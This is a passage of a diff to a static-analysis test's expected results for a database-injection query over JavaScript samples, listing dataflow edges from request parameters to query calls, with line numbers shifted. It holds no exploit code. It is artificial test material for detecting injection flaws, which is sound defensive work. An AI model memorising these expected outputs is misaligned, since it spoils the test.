mongoose.js:115:25:115:45 | cond | mongoose.js:124:28:124:31 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:125:28:125:31 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:126:28:126:31 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:127:18:127:21 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:128:22:128:25 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:129:21:129:24 | cond | provenance | | -| mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:115:25:115:45 | cond | provenance | | -| mongoose.js:130:23:130:24 | id | mongoose.js:130:16:130:26 | { _id: id } | provenance | Config | -| mongoose.js:133:38:133:42 | query | mongoose.js:136:30:136:34 | query | provenance | | -| mongooseJsonParse.js:19:11:19:20 | query | mongooseJsonParse.js:23:19:23:23 | query | provenance | | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:90:21:90:25 | query | provenance | Config | +| 
mongoose.js:21:16:21:29 | req.body.title | mongoose.js:97:14:97:18 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:99:31:99:35 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:119:38:119:42 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:122:30:122:34 | query | provenance | Config | +| mongoose.js:23:22:23:26 | query | mongoose.js:23:21:23:27 | [query] | provenance | Config | +| mongoose.js:23:22:23:26 | query | mongoose.js:25:17:25:21 | query | provenance | | +| mongoose.js:25:17:25:21 | query | mongoose.js:27:22:27:26 | query | provenance | | +| mongoose.js:27:22:27:26 | query | mongoose.js:29:21:29:25 | query | provenance | | +| mongoose.js:29:21:29:25 | query | mongoose.js:31:28:31:32 | query | provenance | | +| mongoose.js:31:28:31:32 | query | mongoose.js:33:16:33:20 | query | provenance | | +| mongoose.js:33:16:33:20 | query | mongoose.js:35:19:35:23 | query | provenance | | +| mongoose.js:35:19:35:23 | query | mongoose.js:37:28:37:32 | query | provenance | | +| mongoose.js:37:28:37:32 | query | mongoose.js:39:28:39:32 | query | provenance | | +| mongoose.js:39:28:39:32 | query | mongoose.js:41:28:41:32 | query | provenance | | +| mongoose.js:41:28:41:32 | query | mongoose.js:43:22:43:26 | query | provenance | | +| mongoose.js:43:22:43:26 | query | mongoose.js:45:18:45:22 | query | provenance | | +| mongoose.js:45:18:45:22 | query | mongoose.js:47:22:47:26 | query | provenance | | +| mongoose.js:47:22:47:26 | query | mongoose.js:49:21:49:25 | query | provenance | | +| mongoose.js:49:21:49:25 | query | mongoose.js:51:32:51:36 | query | provenance | | +| mongoose.js:51:32:51:36 | query | mongoose.js:53:27:53:31 | query | provenance | | +| mongoose.js:53:27:53:31 | query | mongoose.js:54:8:54:12 | query | provenance | | +| mongoose.js:54:8:54:12 | query | mongoose.js:57:17:57:21 | query | provenance | | +| mongoose.js:57:17:57:21 | query 
| mongoose.js:58:10:58:14 | query | provenance | | +| mongoose.js:58:10:58:14 | query | mongoose.js:59:8:59:12 | query | provenance | | +| mongoose.js:59:8:59:12 | query | mongoose.js:60:7:60:11 | query | provenance | | +| mongoose.js:60:7:60:11 | query | mongoose.js:61:16:61:20 | query | provenance | | +| mongoose.js:61:16:61:20 | query | mongoose.js:62:12:62:16 | query | provenance | | +| mongoose.js:62:12:62:16 | query | mongoose.js:63:10:63:14 | query | provenance | | +| mongoose.js:63:10:63:14 | query | mongoose.js:67:37:67:41 | query | provenance | | +| mongoose.js:67:37:67:41 | query | mongoose.js:68:46:68:50 | query | provenance | | +| mongoose.js:68:46:68:50 | query | mongoose.js:69:47:69:51 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:71:46:71:50 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:73:51:73:55 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:75:46:75:50 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:78:46:78:50 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:80:51:80:55 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:82:46:82:50 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:90:21:90:25 | query | provenance | | +| mongoose.js:90:21:90:25 | query | mongoose.js:97:14:97:18 | query | provenance | | +| mongoose.js:97:14:97:18 | query | mongoose.js:99:31:99:35 | query | provenance | | +| mongoose.js:99:31:99:35 | query | mongoose.js:119:38:119:42 | query | provenance | | +| mongoose.js:101:6:101:22 | id | mongoose.js:109:20:109:21 | id | provenance | | +| mongoose.js:101:6:101:22 | id | mongoose.js:116:23:116:24 | id | provenance | | +| mongoose.js:101:11:101:22 | req.query.id | mongoose.js:101:6:101:22 | id | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:102:22:102:25 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | 
mongoose.js:103:21:103:24 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:104:21:104:24 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:105:18:105:21 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:106:22:106:25 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:107:16:107:19 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:108:19:108:22 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:110:28:110:31 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:111:28:111:31 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:112:28:112:31 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:113:18:113:21 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:114:22:114:25 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:115:21:115:24 | cond | provenance | | +| mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:101:25:101:45 | cond | provenance | | +| mongoose.js:116:23:116:24 | id | mongoose.js:116:16:116:26 | { _id: id } | provenance | Config | +| mongoose.js:119:38:119:42 | query | mongoose.js:122:30:122:34 | query | provenance | | +| mongooseJsonParse.js:19:11:19:20 | query | mongooseJsonParse.js:22:19:22:23 | query | provenance | | | mongooseJsonParse.js:19:19:19:20 | {} | mongooseJsonParse.js:19:11:19:20 | query | provenance | | | mongooseJsonParse.js:20:19:20:44 | JSON.pa ... y.data) | mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | provenance | Config | | mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | mongooseJsonParse.js:19:11:19:20 | query | provenance | Config | | mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | mongooseJsonParse.js:19:19:19:20 | {} | provenance | Config | -| mongooseJsonParse.js:20:19:20:50 | JSON.pa ... 
).title | mongooseJsonParse.js:23:19:23:23 | query | provenance | Config | +| mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | mongooseJsonParse.js:22:19:22:23 | query | provenance | Config | | mongooseJsonParse.js:20:30:20:43 | req.query.data | mongooseJsonParse.js:20:19:20:44 | JSON.pa ... y.data) | provenance | Config | | mongooseModelClient.js:10:7:10:32 | v | mongooseModelClient.js:11:22:11:22 | v | provenance | | | mongooseModelClient.js:10:11:10:32 | JSON.pa ... body.x) | mongooseModelClient.js:10:7:10:32 | v | provenance | | 
@@ -621,24 +621,24 @@ edges | redis.js:38:17:38:28 | req.body.key | redis.js:38:11:38:28 | key | provenance | | | socketio.js:10:25:10:30 | handle | socketio.js:11:46:11:51 | handle | provenance | | | socketio.js:11:46:11:51 | handle | socketio.js:11:12:11:53 | `INSERT ... andle}` | provenance | | -| tst2.js:9:66:9:78 | req.params.id | tst2.js:9:27:9:84 | "select ... d + "'" | provenance | | +| tst2.js:8:66:8:78 | req.params.id | tst2.js:8:27:8:84 | "select ... d + "'" | provenance | | | tst3.js:7:7:8:55 | query1 | tst3.js:9:14:9:19 | query1 | provenance | | | tst3.js:8:16:8:34 | req.params.category | tst3.js:7:7:8:55 | query1 | provenance | | | tst4.js:8:46:8:60 | $routeParams.id | tst4.js:8:10:8:66 | 'SELECT ... d + '"' | provenance | | | tst.js:10:46:10:58 | req.params.id | tst.js:10:10:10:64 | 'SELECT ... d + '"' | provenance | | subpaths #select -| graphql.js:10:34:20:5 | `\\n ... }\\n ` | graphql.js:8:16:8:28 | req.params.id | graphql.js:10:34:20:5 | `\\n ... }\\n ` | This query string depends on a $@. | graphql.js:8:16:8:28 | req.params.id | user-provided value | -| graphql.js:27:30:27:40 | `foo ${id}` | graphql.js:26:16:26:28 | req.params.id | graphql.js:27:30:27:40 | `foo ${id}` | This query string depends on a $@. | graphql.js:26:16:26:28 | req.params.id | user-provided value | -| graphql.js:30:32:30:42 | `foo ${id}` | graphql.js:26:16:26:28 | req.params.id | graphql.js:30:32:30:42 | `foo ${id}` | This query string depends on a $@. | graphql.js:26:16:26:28 | req.params.id | user-provided value | -| graphql.js:33:18:33:28 | `foo ${id}` | graphql.js:26:16:26:28 | req.params.id | graphql.js:33:18:33:28 | `foo ${id}` | This query string depends on a $@. | graphql.js:26:16:26:28 | req.params.id | user-provided value | -| graphql.js:44:14:44:24 | `foo ${id}` | graphql.js:39:16:39:28 | req.params.id | graphql.js:44:14:44:24 | `foo ${id}` | This query string depends on a $@. 
| graphql.js:39:16:39:28 | req.params.id | user-provided value | -| graphql.js:48:44:48:54 | `foo ${id}` | graphql.js:39:16:39:28 | req.params.id | graphql.js:48:44:48:54 | `foo ${id}` | This query string depends on a $@. | graphql.js:39:16:39:28 | req.params.id | user-provided value | -| graphql.js:56:39:56:49 | `foo ${id}` | graphql.js:55:16:55:28 | req.params.id | graphql.js:56:39:56:49 | `foo ${id}` | This query string depends on a $@. | graphql.js:55:16:55:28 | req.params.id | user-provided value | -| graphql.js:58:66:58:76 | `foo ${id}` | graphql.js:55:16:55:28 | req.params.id | graphql.js:58:66:58:76 | `foo ${id}` | This query string depends on a $@. | graphql.js:55:16:55:28 | req.params.id | user-provided value | -| graphql.js:75:46:75:64 | "{ foo" + id + " }" | graphql.js:74:14:74:25 | req.query.id | graphql.js:75:46:75:64 | "{ foo" + id + " }" | This query string depends on a $@. | graphql.js:74:14:74:25 | req.query.id | user-provided value | -| graphql.js:84:14:90:8 | `{\\n ... }` | graphql.js:74:14:74:25 | req.query.id | graphql.js:84:14:90:8 | `{\\n ... }` | This query string depends on a $@. | graphql.js:74:14:74:25 | req.query.id | user-provided value | -| graphql.js:120:38:120:48 | `foo ${id}` | graphql.js:119:16:119:28 | req.params.id | graphql.js:120:38:120:48 | `foo ${id}` | This query string depends on a $@. | graphql.js:119:16:119:28 | req.params.id | user-provided value | +| graphql.js:9:34:19:5 | ` // $ ... }\\n ` | graphql.js:8:16:8:28 | req.params.id | graphql.js:9:34:19:5 | ` // $ ... }\\n ` | This query string depends on a $@. | graphql.js:8:16:8:28 | req.params.id | user-provided value | +| graphql.js:26:30:26:40 | `foo ${id}` | graphql.js:25:16:25:28 | req.params.id | graphql.js:26:30:26:40 | `foo ${id}` | This query string depends on a $@. 
| graphql.js:25:16:25:28 | req.params.id | user-provided value | +| graphql.js:29:32:29:42 | `foo ${id}` | graphql.js:25:16:25:28 | req.params.id | graphql.js:29:32:29:42 | `foo ${id}` | This query string depends on a $@. | graphql.js:25:16:25:28 | req.params.id | user-provided value | +| graphql.js:32:18:32:28 | `foo ${id}` | graphql.js:25:16:25:28 | req.params.id | graphql.js:32:18:32:28 | `foo ${id}` | This query string depends on a $@. | graphql.js:25:16:25:28 | req.params.id | user-provided value | +| graphql.js:43:14:43:24 | `foo ${id}` | graphql.js:38:16:38:28 | req.params.id | graphql.js:43:14:43:24 | `foo ${id}` | This query string depends on a $@. | graphql.js:38:16:38:28 | req.params.id | user-provided value | +| graphql.js:47:44:47:54 | `foo ${id}` | graphql.js:38:16:38:28 | req.params.id | graphql.js:47:44:47:54 | `foo ${id}` | This query string depends on a $@. | graphql.js:38:16:38:28 | req.params.id | user-provided value | +| graphql.js:55:39:55:49 | `foo ${id}` | graphql.js:54:16:54:28 | req.params.id | graphql.js:55:39:55:49 | `foo ${id}` | This query string depends on a $@. | graphql.js:54:16:54:28 | req.params.id | user-provided value | +| graphql.js:57:66:57:76 | `foo ${id}` | graphql.js:54:16:54:28 | req.params.id | graphql.js:57:66:57:76 | `foo ${id}` | This query string depends on a $@. | graphql.js:54:16:54:28 | req.params.id | user-provided value | +| graphql.js:74:46:74:64 | "{ foo" + id + " }" | graphql.js:73:14:73:25 | req.query.id | graphql.js:74:46:74:64 | "{ foo" + id + " }" | This query string depends on a $@. | graphql.js:73:14:73:25 | req.query.id | user-provided value | +| graphql.js:82:14:88:8 | `{ // $ ... }` | graphql.js:73:14:73:25 | req.query.id | graphql.js:82:14:88:8 | `{ // $ ... }` | This query string depends on a $@. 
| graphql.js:73:14:73:25 | req.query.id | user-provided value | +| graphql.js:118:38:118:48 | `foo ${id}` | graphql.js:117:16:117:28 | req.params.id | graphql.js:118:38:118:48 | `foo ${id}` | This query string depends on a $@. | graphql.js:117:16:117:28 | req.params.id | user-provided value | | html-sanitizer.js:16:9:16:59 | `SELECT ... param1 | html-sanitizer.js:13:39:13:44 | param1 | html-sanitizer.js:16:9:16:59 | `SELECT ... param1 | This query string depends on a $@. | html-sanitizer.js:13:39:13:44 | param1 | user-provided value | | json-schema-validator.js:33:22:33:26 | query | json-schema-validator.js:25:34:25:47 | req.query.data | json-schema-validator.js:33:22:33:26 | query | This query object depends on a $@. | json-schema-validator.js:25:34:25:47 | req.query.data | user-provided value | | json-schema-validator.js:35:18:35:22 | query | json-schema-validator.js:25:34:25:47 | req.query.data | json-schema-validator.js:35:18:35:22 | query | This query object depends on a $@. | json-schema-validator.js:25:34:25:47 | req.query.data | user-provided value | 
@@ -650,67 +650,67 @@ subpaths | ldap.js:32:5:32:61 | { filte ... e}))` } | ldap.js:20:21:20:27 | req.url | ldap.js:32:5:32:61 | { filte ... e}))` } | This query string depends on a $@. | ldap.js:20:21:20:27 | req.url | user-provided value | | ldap.js:66:30:66:53 | { filte ... ilter } | ldap.js:20:21:20:27 | req.url | ldap.js:66:30:66:53 | { filte ... ilter } | This query string depends on a $@. | ldap.js:20:21:20:27 | req.url | user-provided value | | ldap.js:68:27:68:42 | `cn=${username}` | ldap.js:20:21:20:27 | req.url | ldap.js:68:27:68:42 | `cn=${username}` | This query string depends on a $@. | ldap.js:20:21:20:27 | req.url | user-provided value | -| marsdb-flow-to.js:14:17:14:21 | query | marsdb-flow-to.js:11:17:11:24 | req.body | marsdb-flow-to.js:14:17:14:21 | query | This query object depends on a $@. | marsdb-flow-to.js:11:17:11:24 | req.body | user-provided value | -| marsdb.js:16:12:16:16 | query | marsdb.js:13:17:13:24 | req.body | marsdb.js:16:12:16:16 | query | This query object depends on a $@. | marsdb.js:13:17:13:24 | req.body | user-provided value | -| minimongo.js:18:12:18:16 | query | minimongo.js:15:17:15:24 | req.body | minimongo.js:18:12:18:16 | query | This query object depends on a $@. | minimongo.js:15:17:15:24 | req.body | user-provided value | -| mongodb.js:18:16:18:20 | query | mongodb.js:13:19:13:26 | req.body | mongodb.js:18:16:18:20 | query | This query object depends on a $@. | mongodb.js:13:19:13:26 | req.body | user-provided value | -| mongodb.js:32:18:32:45 | { title ... itle) } | mongodb.js:26:19:26:26 | req.body | mongodb.js:32:18:32:45 | { title ... itle) } | This query object depends on a $@. | mongodb.js:26:19:26:26 | req.body | user-provided value | -| mongodb.js:54:16:54:20 | query | mongodb.js:49:19:49:33 | req.query.title | mongodb.js:54:16:54:20 | query | This query object depends on a $@. 
| mongodb.js:49:19:49:33 | req.query.title | user-provided value | -| mongodb.js:65:12:65:16 | query | mongodb.js:60:16:60:30 | req.query.title | mongodb.js:65:12:65:16 | query | This query object depends on a $@. | mongodb.js:60:16:60:30 | req.query.title | user-provided value | -| mongodb.js:77:14:77:26 | { tags: tag } | mongodb.js:70:13:70:25 | req.query.tag | mongodb.js:77:14:77:26 | { tags: tag } | This query object depends on a $@. | mongodb.js:70:13:70:25 | req.query.tag | user-provided value | -| mongodb.js:85:12:85:24 | { tags: tag } | mongodb.js:70:13:70:25 | req.query.tag | mongodb.js:85:12:85:24 | { tags: tag } | This query object depends on a $@. | mongodb.js:70:13:70:25 | req.query.tag | user-provided value | -| mongodb.js:112:14:112:18 | query | mongodb.js:107:17:107:29 | queries.title | mongodb.js:112:14:112:18 | query | This query object depends on a $@. | mongodb.js:107:17:107:29 | queries.title | user-provided value | -| mongodb_bodySafe.js:29:16:29:20 | query | mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:29:16:29:20 | query | This query object depends on a $@. | mongodb_bodySafe.js:24:19:24:33 | req.query.title | user-provided value | -| mongoose.js:24:21:24:27 | [query] | mongoose.js:21:16:21:23 | req.body | mongoose.js:24:21:24:27 | [query] | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:27:17:27:21 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:27:17:27:21 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:30:22:30:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:30:22:30:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:33:21:33:25 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:33:21:33:25 | query | This query object depends on a $@. 
| mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:36:28:36:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:36:28:36:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:39:16:39:20 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:39:16:39:20 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:42:19:42:23 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:42:19:42:23 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:45:28:45:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:45:28:45:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:48:28:48:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:48:28:48:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:51:28:51:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:51:28:51:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:54:22:54:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:54:22:54:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:57:18:57:22 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:57:18:57:22 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:60:22:60:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:60:22:60:26 | query | This query object depends on a $@. 
| mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:63:21:63:25 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:63:21:63:25 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:65:32:65:36 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:65:32:65:36 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:67:27:67:31 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:67:27:67:31 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:68:8:68:12 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:68:8:68:12 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:71:17:71:21 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:71:17:71:21 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:72:10:72:14 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:72:10:72:14 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:73:8:73:12 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:73:8:73:12 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:74:7:74:11 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:74:7:74:11 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:75:16:75:20 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:75:16:75:20 | query | This query object depends on a $@. 
| mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:77:10:77:14 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:77:10:77:14 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| marsdb-flow-to.js:13:17:13:21 | query | marsdb-flow-to.js:11:17:11:24 | req.body | marsdb-flow-to.js:13:17:13:21 | query | This query object depends on a $@. | marsdb-flow-to.js:11:17:11:24 | req.body | user-provided value | +| marsdb.js:15:12:15:16 | query | marsdb.js:13:17:13:24 | req.body | marsdb.js:15:12:15:16 | query | This query object depends on a $@. | marsdb.js:13:17:13:24 | req.body | user-provided value | +| minimongo.js:17:12:17:16 | query | minimongo.js:15:17:15:24 | req.body | minimongo.js:17:12:17:16 | query | This query object depends on a $@. | minimongo.js:15:17:15:24 | req.body | user-provided value | +| mongodb.js:17:16:17:20 | query | mongodb.js:13:19:13:26 | req.body | mongodb.js:17:16:17:20 | query | This query object depends on a $@. | mongodb.js:13:19:13:26 | req.body | user-provided value | +| mongodb.js:30:18:30:45 | { title ... itle) } | mongodb.js:25:19:25:26 | req.body | mongodb.js:30:18:30:45 | { title ... itle) } | This query object depends on a $@. | mongodb.js:25:19:25:26 | req.body | user-provided value | +| mongodb.js:51:16:51:20 | query | mongodb.js:47:19:47:33 | req.query.title | mongodb.js:51:16:51:20 | query | This query object depends on a $@. | mongodb.js:47:19:47:33 | req.query.title | user-provided value | +| mongodb.js:61:12:61:16 | query | mongodb.js:57:16:57:30 | req.query.title | mongodb.js:61:12:61:16 | query | This query object depends on a $@. | mongodb.js:57:16:57:30 | req.query.title | user-provided value | +| mongodb.js:72:14:72:26 | { tags: tag } | mongodb.js:66:13:66:25 | req.query.tag | mongodb.js:72:14:72:26 | { tags: tag } | This query object depends on a $@. 
| mongodb.js:66:13:66:25 | req.query.tag | user-provided value | +| mongodb.js:79:12:79:24 | { tags: tag } | mongodb.js:66:13:66:25 | req.query.tag | mongodb.js:79:12:79:24 | { tags: tag } | This query object depends on a $@. | mongodb.js:66:13:66:25 | req.query.tag | user-provided value | +| mongodb.js:105:14:105:18 | query | mongodb.js:101:17:101:29 | queries.title | mongodb.js:105:14:105:18 | query | This query object depends on a $@. | mongodb.js:101:17:101:29 | queries.title | user-provided value | +| mongodb_bodySafe.js:28:16:28:20 | query | mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:28:16:28:20 | query | This query object depends on a $@. | mongodb_bodySafe.js:24:19:24:33 | req.query.title | user-provided value | +| mongoose.js:23:21:23:27 | [query] | mongoose.js:21:16:21:23 | req.body | mongoose.js:23:21:23:27 | [query] | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:25:17:25:21 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:25:17:25:21 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:27:22:27:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:27:22:27:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:29:21:29:25 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:29:21:29:25 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:31:28:31:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:31:28:31:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:33:16:33:20 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:33:16:33:20 | query | This query object depends on a $@. 
| mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:35:19:35:23 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:35:19:35:23 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:37:28:37:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:37:28:37:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:39:28:39:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:39:28:39:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:41:28:41:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:41:28:41:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:43:22:43:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:43:22:43:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:45:18:45:22 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:45:18:45:22 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:47:22:47:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:47:22:47:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:49:21:49:25 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:49:21:49:25 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:51:32:51:36 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:51:32:51:36 | query | This query object depends on a $@. 
| mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:53:27:53:31 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:53:27:53:31 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:54:8:54:12 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:54:8:54:12 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:57:17:57:21 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:57:17:57:21 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:58:10:58:14 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:58:10:58:14 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:59:8:59:12 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:59:8:59:12 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:60:7:60:11 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:60:7:60:11 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:61:16:61:20 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:61:16:61:20 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:63:10:63:14 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:63:10:63:14 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:68:46:68:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:68:46:68:50 | query | This query object depends on a $@. 
| mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:69:47:69:51 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:69:47:69:51 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:71:46:71:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:71:46:71:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:73:51:73:55 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:73:51:73:55 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:75:46:75:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:75:46:75:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:78:46:78:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:78:46:78:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:80:51:80:55 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:80:51:80:55 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | | mongoose.js:82:46:82:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:82:46:82:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:83:47:83:51 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:83:47:83:51 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:85:46:85:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:85:46:85:50 | query | 